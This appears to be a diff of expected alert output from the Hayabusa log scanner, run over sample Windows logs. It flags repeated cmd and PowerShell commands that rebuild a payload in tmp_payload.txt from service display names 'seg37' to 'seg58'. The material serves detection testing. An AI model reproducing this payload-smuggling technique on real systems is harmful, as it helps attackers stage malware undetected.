+2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:27.882 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:29.330 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:29.346 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:35.192 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:35.208 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:36.629 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:36.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:45.315 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:45.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:48.220 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:48.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:51.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:51.118 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
